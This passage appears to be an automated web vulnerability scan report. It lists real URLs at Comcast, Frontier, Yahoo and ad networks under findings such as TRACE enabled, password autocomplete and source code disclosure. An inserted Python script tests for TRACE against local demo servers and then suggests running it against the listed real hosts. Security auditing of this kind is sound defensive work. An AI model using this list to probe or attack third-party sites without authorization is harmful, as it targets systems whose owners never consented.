10.31. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568
10.32. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568
10.33. http://ads.pointroll.com/PortalServe/
10.34. http://adserver.teracent.net/tase/ad
10.35. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp
10.36. http://ak1.abmr.net/is/www.burstnet.com
10.37. http://autos.yahoo.com/darla/fc.php
10.38. http://autos.yahoo.com/darla/md.php
10.39. http://b.scorecardresearch.com/b
10.40. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1
10.41. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1
10.42. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI
10.43. http://ehg-verizon.hitbox.com/HG
10.44. http://espanol.vonage.com/mpel.js
10.45. http://external.dmtracker.com/tags/vs.js
10.46. http://finance.yahoo.com/
10.47. http://finance.yahoo.com/q
10.48. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
10.49. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message
10.50. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36
10.51. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js
10.52. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js
10.53. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js
10.54. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js
10.55. http://frontier.com/AgentOrdering/javascripts/validateinteger.js
10.56. http://frontier.com/Controls/VirtualCode.ashx
10.57. http://frontier.com/Js/formHelpers.js
10.58. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js
10.59. http://frontier.com/Js/jQuery/jquery.maskedinput.js
10.60. http://frontier.com/Js/s_code.js
10.61. http://frontier.com/Resources/3rdParty/HBX/hbx.js
10.62. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js
10.63. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js
10.64. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js
10.65. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js
10.66. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js
10.67. http://frontier.com/images/FTRMain/frontier_Logo.jpg
10.68. http://frontier.com/images/FTRMain/gradientBox.png
10.69. http://frontier.com/images/FTRMain/small_arrow.png
10.70. http://frontier.com/images/icon_print.gif
10.71. http://frontier.com/js/jquery/jquery.numeric.js
10.72. http://frontier.my.yahoo.com/
10.73. http://frontier.my.yahoo.com/e/js
10.74. http://gdyn.pgatour.com/1.1/1.gif
10.75. http://int.teracent.net/tase/int
10.76. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
10.77. http://maps.yahoo.com/
10.78. http://marketing.aptela.com/js/mktFormSupport.js
10.79. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
10.80. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js
10.81. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js
10.82. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js
10.83. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js
10.84. http://optimized-by.rubiconproject.com/a/dk.js
10.85. http://pixel.fetchback.com/serve/fb/pdc
10.86. http://pixel.quantserve.com/api/segments.json
10.87. http://pixel.quantserve.com/pixel
10.88. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443
10.89. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443
10.90. http://redirect.rtrk.com/redirect
10.91. http://sales.liveperson.net/hc/21807557/
10.92. http://sales.liveperson.net/hc/21807557/
10.93. http://sales.liveperson.net/hc/21807557/
10.94. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**
10.95. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**
10.96. http://sdc.usps.com/dcs731qdj000004f27giixw3q_2i4w/dcs.gif
10.97. http://sdc.usps.com/dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif
10.98. http://sensor2.suitesmart.com/sensor4.js
10.99. http://sports.yahoo.com/mlb/recap
10.100. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
10.101. http://testdm.travelers.com/trvwics.gif
10.102. http://thesearchagency.net/pixspike.php
10.103. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif
10.104. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif
10.105. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif
10.106. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif
10.107. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif
10.108. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif
10.109. http://udmserve.net/udm/img.fetch
10.110. http://utdi.reachlocal.com/
10.111. http://utdi.reachlocal.net/index.html
10.112. http://video.music.yahoo.com/up/fop/process/getPlaylistFOP.php
10.113. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
10.114. http://www.aptela.com/mainstylesheet.css/
10.115. http://www.aptela.com/misc/privacy-policy/
10.116. http://www.aptela.com/my-account/
10.117. http://www.aptela.com/my-account/login-error/
10.118. http://www.burstnet.com/enlightn/8117/3E06/
10.119. http://www.comcast.com/includes/js/CookieHelper.js
10.120. http://www.comcast.com/includes/omniture/s_code.js
10.121. https://www.comcast.com/Localization/Localize.cspx
10.122. https://www.comcast.com/includes/js/IDGenerator.ashx
10.123. http://www.fairpoint.com/residential/
10.124. http://www.fairpoint.com/servlet/CityTelcoMappingServlet
10.125. http://www.frontier.com/Js/s_code.js
10.126. http://www.frontierpages.com/SelectRegion.asp
10.127. http://www.frontierpages.com/scripts/s_code.js
10.128. http://www.googleadservices.com/pagead/aclk
10.129. http://www.myfitv.com/
10.130. http://www.myfitv.com/portal/recent_tv_elastic
10.131. http://www.myfitv.com/search
10.132. http://www.zillow.com/app
11. Password field with autocomplete enabled
11.1. https://login.comcast.net/login
11.2. https://login.frontier.com/webmail/
11.3. https://login.yahoo.com/config/login_verify2
11.4. http://www.aptela.com/my-account/
11.5. http://www.aptela.com/my-account/login-error/
11.6. https://www.frontier.com/AgentOrdering/Login/
11.7. https://www.frontier.com/AgentOrdering/Login/Default.aspx
11.8. https://www.frontier.com/BillPay/Login.aspx
11.9. https://www.frontier.com/Shop/Login.aspx
11.10. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
11.11. https://www.usps.com/ContentTemplates/common/scripts/login.js
11.12. http://www.vonage.com/
11.13. http://www.whitefence.com/404.html
11.14. http://www.whitefence.com/category/high-speed-internet/
11.15. http://www.whitefence.com/category/home-phone/
11.16. http://www.whitefence.com/category/television-service/
12. Source code disclosure
12.1. http://frontier.my.yahoo.com/
12.2. http://www.aptela.com/my-account/
12.3. http://www.aptela.com/my-account/login-error/
13. Referer-dependent response
13.1. http://f.fontdeck.com/f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff
13.2. http://f.fontdeck.com/f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff
13.3. http://f.fontdeck.com/f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff
13.4. http://f.fontdeck.com/f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff
13.5. http://ichart.finance.yahoo.com/instrument/1.0/%5EDJI/chart
13.6. http://sitesearch.comcast.com/
13.7. http://use.typekit.com/k/apb3goi-d.css
13.8. http://www.facebook.com/plugins/like.php
13.9. http://www.facebook.com/plugins/likebox.php
13.10. http://www.whitefence.com/category/high-speed-internet/
13.11. http://www.whitefence.com/category/home-phone/
13.12. http://www.whitefence.com/category/television-service/
14. Cross-domain POST
14.1. https://login.frontier.com/webmail/
14.2. http://www.aptela.com/lp2011/T2V1/
14.3. http://www.aptela.com/lp2011/T2V1/
14.4. http://www.frontierhelp.com/frontiernetnews.cfm
14.5. http://www.frontierhelp.com/techsupport.cfm
15. Cross-domain Referer leakage
15.1. http://ad.agkn.com/iframe!t=1129!
15.2. http://ad.agkn.com/iframe!t=1131!
15.3. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2
15.4. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11
15.5. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12
15.6. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396
15.7. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400
15.8. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2
15.9. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101
15.10. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102
15.11. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36
15.12. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36
15.13. http://ad.doubleclick.net/adj/N3880.SD153730.3880/B5030675.119
15.14. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3
15.15. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3
15.16. http://ad.doubleclick.net/adj/N6092.yahoo.com/B5098223.114
15.17. http://ad.doubleclick.net/adj/ober.frontier/product_119282623
15.18. http://ad.doubleclick.net/adj/ober.frontier/product_undefined
15.19. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599
15.20. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**
15.21. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877
15.22. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**
15.23. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208
15.24. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**
15.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276
15.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063
15.27. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**
15.28. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**
15.29. http://ad.yieldmanager.com/iframe3
15.30. http://ad.yieldmanager.com/iframe3
15.31. http://ad.yieldmanager.com/iframe3
15.32. http://ad.yieldmanager.com/iframe3
15.33. http://ad.yieldmanager.com/iframe3
15.34. http://ad.yieldmanager.com/iframe3
15.35. http://ad.yieldmanager.com/iframe3
15.36. http://ad.yieldmanager.com/iframe3
15.37. http://ad.yieldmanager.com/iframe3
15.38. http://ad.yieldmanager.com/iframe3
15.39. http://ad.yieldmanager.com/iframe3
15.40. http://ad.yieldmanager.com/iframe3
15.41. http://ad.yieldmanager.com/iframe3
15.42. http://admin.brightcove.com/js/BrightcoveExperiences_all.js
15.43. http://adserver.teracent.net/tase/ad
15.44. http://adserver.teracent.net/tase/ad
15.45. http://as.casalemedia.com/j
15.46. http://as.casalemedia.com/j
15.47. http://as.casalemedia.com/j
15.48. http://as.casalemedia.com/j
15.49. http://as.casalemedia.com/j
15.50. http://as1.suitesmart.com/99917/G15493.js
15.51. http://autos.yahoo.com/darla/fc.php
15.52. http://autos.yahoo.com/darla/fc.php
15.53. http://beacon.dedicatednetworks.com/js/t.aspx
15.54. http://cm.g.doubleclick.net/pixel
15.55. http://cm.g.doubleclick.net/pixel
15.56. http://cm.g.doubleclick.net/pixel
15.57. http://customer.comcast.com/Pages/FAQDisplay.aspx
15.58. http://customer.comcast.com/Pages/FAQViewer.aspx
15.59. http://finance.yahoo.com/lookup
15.60. http://finance.yahoo.com/q
15.61. http://frontier.com/winwin1
15.62. http://games.frontier.com/game.htm
15.63. http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**
15.64. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp
15.65. http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click
15.66. http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk
15.67. http://ib.adnxs.com/seg
15.68. http://ib.adnxs.com/ttj
15.69. http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js
15.70. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php
15.71. http://l.yimg.com/zz/combo
15.72. http://l.yimg.com/zz/combo
15.73. http://l.yimg.com/zz/combo
15.74. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
15.75. https://login.comcast.net/myaccount/lookup
15.76. https://login.frontiermobile.com/
15.77. https://login.yahoo.com/config/login_verify2
15.78. http://maps.yahoo.com/darla_fc
15.79. http://maps.yahoo.com/darla_fc
15.80. http://maps.yahoo.com/pvproxy
15.81. http://new.music.yahoo.com/recommendedHP/
15.82. http://omg.yahoo.com/xhr/ad/LREC/2115806991
15.83. http://pixel.everesttech.net/2565/c
15.84. http://pro.tweetmeme.com/button.js
15.85. http://realestate.yahoo.com/darla/fc.php
15.86. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale
15.87. http://redirect.rtrk.com/redirect
15.88. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**
15.89. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**
15.90. http://search.keywordblocks.com/
15.91. http://search.keywordblocks.com/
15.92. http://search.yahoo.com/search
15.93. http://shop.comcast.com/XFINITY/voice/
15.94. http://shopping.yahoo.com/search
15.95. http://show.partners-z.com/s/show
15.96. http://sitesearch.comcast.com/
15.97. http://sports.yahoo.com/mlb/recap
15.98. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
15.99. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
15.100. http://udmserve.net/udm/img.fetch
15.101. https://us.etrade.com/e/t/jumppage/viewjumppage
15.102. http://utdi.reachlocal.com/
15.103. http://utdi.reachlocal.net/index.html
15.104. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.105. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.106. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.107. http://view.atdmt.com/TR1/iview/332867993/direct/01
15.108. http://view.atdmt.com/ULA/iview/351127232/direct/01
15.109. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
15.110. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
15.111. http://www.aptela.com/lp2011/T2V1/
15.112. http://www.comcast.com/Corporate/Customers/contactus/ContactUs.html
15.113. https://www.comcast.com/Localization/Localize.cspx
15.114. http://www.facebook.com/plugins/activity.php
15.115. http://www.facebook.com/plugins/likebox.php
15.116. http://www.facebook.com/plugins/likebox.php
15.117. http://www.facebook.com/plugins/likebox.php
15.118. http://www.google.com/search
15.119. http://www.myfitv.com/javascripts/all.js
15.120. http://www.myfitv.com/search
15.121. http://www.myfitv.com/search
15.122. http://www.scottrade.com/online-trading.html
15.123. http://www.vonage.com/
15.124. http://www.vonage.com/search.php
15.125. http://www.xfinity.com/js-api/compressed/xpbar.js
15.126. http://www.xfinity.com/js-api/compressed/xpbar.js
15.127. http://xfinity.comcast.net/xpbar/1/default/
15.128. http://xfinity.comcast.net/xpbar/2/default/
15.129. http://yp.frontierpages.com/results.aspx
16. Cross-domain script include
16.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2
16.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11
16.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12
16.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396
16.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400
16.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2
16.7. http://ad.yieldmanager.com/iframe3
16.8. http://ad.yieldmanager.com/iframe3
16.9. http://ad.yieldmanager.com/iframe3
16.10. http://ad.yieldmanager.com/iframe3
16.11. http://autos.yahoo.com/
16.12. http://autos.yahoo.com/bentley/continental-gtc/2011/
16.13. http://cdn.optmd.com/V2/80181/197812/index.html
16.14. http://cdn.optmd.com/V2/80181/197813/index.html
16.15. http://customer.comcast.com/Pages/FAQViewer.aspx
16.16. http://finance.yahoo.com/
16.17. http://finance.yahoo.com/lookup
16.18. http://finance.yahoo.com/q
16.19. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
16.20. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566
16.21. http://forums.comcast.com/t5/user/viewprofilepage/user-id/3616087
16.22. http://frontier.my.yahoo.com/
16.23. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php
16.24. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
16.25. https://login.comcast.net/myaccount/lookup
16.26. https://login.yahoo.com/config/login_verify2
16.27. http://maps.yahoo.com/
16.28. http://movies.yahoo.com/
16.29. http://new.music.yahoo.com/
16.30. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
16.31. http://omg.yahoo.com/
16.32. http://pro.tweetmeme.com/button.js
16.33. http://realestate.yahoo.com/
16.34. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale
16.35. http://servicetips.whitefence.com/
16.36. http://shopping.yahoo.com/
16.37. http://shopping.yahoo.com/search
16.38. http://sitesearch.comcast.com/
16.39. http://sports.yahoo.com/
16.40. http://sports.yahoo.com/
16.41. http://sports.yahoo.com/mlb/recap
16.42. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
16.43. http://support.aptela.com:9000/tools/ResetPassword.cgi
16.44. http://udmserve.net/udm/img.fetch
16.45. https://us.etrade.com/e/t/jumppage/viewjumppage
16.46. http://utdi.reachlocal.net/index.html
16.47. http://view.atdmt.com/TR1/iview/332867993/direct/01
16.48. http://www.aptela.com/lp2011/T2V1/
16.49. http://www.aptela.com/mainstylesheet.css/
16.50. http://www.aptela.com/misc/privacy-policy/
16.51. http://www.aptela.com/my-account/
16.52. http://www.aptela.com/my-account/login-error/
16.53. http://www.comcast.com/Corporate/Customers/custcare.html
16.54. http://www.comcast.com/Movers/Move.cspx
16.55. https://www.comcast.com/Localization/Localize.cspx
16.56. https://www.comcastsupport.com/ChatEntry/
16.57. https://www.comcastsupport.com/chatentry/Default.aspx
16.58. http://www.facebook.com/plugins/activity.php
16.59. http://www.facebook.com/plugins/likebox.php
16.60. http://www.fairpoint.com/residential/
16.61. http://www.frontier.com/
16.62. http://www.myfitv.com/
16.63. http://www.myfitv.com/portal/recent_tv_elastic
16.64. http://www.myfitv.com/search
16.65. http://www.ooma.com/
16.66. http://www.ooma.com/premier
16.67. http://www.ooma.com/premier/features
16.68. http://www.vonage.com/
16.69. http://www.whitefence.com/404.html
16.70. http://www.whitefence.com/category/high-speed-internet/
16.71. http://www.whitefence.com/category/home-phone/
16.72. http://www.whitefence.com/category/television-service/
17. TRACE method is enabled
17.1. http://40.xg4ken.com/
17.2. http://ads.media.net/
17.3. http://gdyn.pgatour.com/
17.4. http://integrate.112.2o7.net/
17.5. https://login.aptela.com/
17.6. http://mi.adinterax.com/
17.7. http://optimized-by.rubiconproject.com/
17.8. http://pixel.everesttech.net/
17.9. http://pixel.fetchback.com/
17.10. http://sensor2.suitesmart.com/
17.11. http://show.partners-z.com/
17.12. http://sitesearch.comcast.com/
17.13. http://support.aptela.com:9000/
17.14. http://www.aptela.com/
17.15. http://www.fairpoint.com/
17.16. http://www.myfitv.com/
17.17. http://www.ooma.com/
17.18. http://www.pgatour.com/
17.19. http://www.vonage.com/
17.20. http://www.whitefence.com/
17.21. http://www2.whitefence.com/
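The "TRACE method is enabled" entries above list hosts that answered a TRACE request. The following is an added example, not code from the XSS.Cx report or from any of the sites listed: it spins up two throwaway local HTTP servers (constructed for the demo, one that reflects TRACE requests and one that refuses them with 405) and probes each with a marked TRACE request. The host, port and header name are assumptions for the demo; the point is that the check keys on the marker being reflected in the body, not on the status code, because reflection of request headers (including Cookie and Authorization) is what makes an enabled TRACE worth reporting.

```python
"""Probe a server for an enabled HTTP TRACE method (added example, not part of the report)."""
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

MARKER_HEADER = "X-Trace-Probe"  # assumed header name for the probe


class EchoingHandler(BaseHTTPRequestHandler):
    """Constructed insecure server: TRACE reflects the request line and headers."""

    def do_TRACE(self):
        data = (self.requestline + "\r\n" + str(self.headers)).encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):  # keep the demo quiet
        pass


class HardenedHandler(EchoingHandler):
    """Constructed hardened server: TRACE is refused and nothing is reflected."""

    def do_TRACE(self):
        self.send_response(405)
        self.send_header("Allow", "GET")
        self.send_header("Content-Length", "0")
        self.end_headers()


def trace_enabled(host, port, path="/"):
    """Return True only if our random marker header comes back in a 200 TRACE response."""
    marker = "probe-" + secrets.token_hex(8)
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("TRACE", path, headers={MARKER_HEADER: marker})
        resp = conn.getresponse()
        body = resp.read().decode(errors="replace")
    finally:
        conn.close()
    return resp.status == 200 and marker in body


def start_server(handler):
    """Bind an ephemeral loopback port and serve in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def demo():
    """Probe both constructed servers; returns {"echoing": True, "hardened": False}."""
    results = {}
    for name, handler in (("echoing", EchoingHandler), ("hardened", HardenedHandler)):
        srv = start_server(handler)
        try:
            results[name] = trace_enabled("127.0.0.1", srv.server_address[1])
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for name, enabled in demo().items():
        print(f"{name}: TRACE {'ENABLED' if enabled else 'disabled'}")
```

Against a real target, point `trace_enabled` at the host from the list; a server that answers 200 but does not echo the marker is not reported, which avoids false positives from front-ends that swallow unknown methods.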
18. Email addresses disclosed
18.1. http://autos.yahoo.com/bentley/continental-gtc/2011/
18.2. http://forums.comcast.com/html/js/s_code.js
18.3. http://games.frontier.com/BodyScripts.aspx
18.4. http://games.frontier.com/game.htm
18.5. http://l.yimg.com/a/combo
18.6. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
18.7. https://login.comcast.net/myaccount/js/omniture.js
18.8. https://login.comcast.net/static/js/omniture.js
18.9. https://login.yahoo.com/config/login_verify2
18.10. http://postcalc.usps.gov/
18.11. http://sitesearch.comcast.com/
18.12. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad
18.13. http://utdi.reachlocal.net/index.html
18.14. http://www.aptela.com/mainstylesheet.css/
18.15. http://www.aptela.com/misc/privacy-policy/
18.16. http://www.aptela.com/my-account/
18.17. http://www.aptela.com/my-account/login-error/
18.18. http://www.comcast.com/Movers/Move.cspx
18.19. https://www.comcastsupport.com/ChatEntry/js/jquery.cookie.js
18.20. https://www.comcastsupport.com/ChatEntry/js/jquery.jqprint.js
18.21. https://www.comcastsupport.com/ChatEntry/js/jquery.mb.menu/mbMenu.js
18.22. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.hoverIntent.js
18.23. https://www.comcastsupport.com/ChatEntry/js/plugins/jquery.metadata.js
18.24. http://www.fairpoint.com/scripts/jquery/plugins/selectToUISlider.jQuery.js
18.25. http://www.frontier.com/yahoo/js/CCallWrapper.js
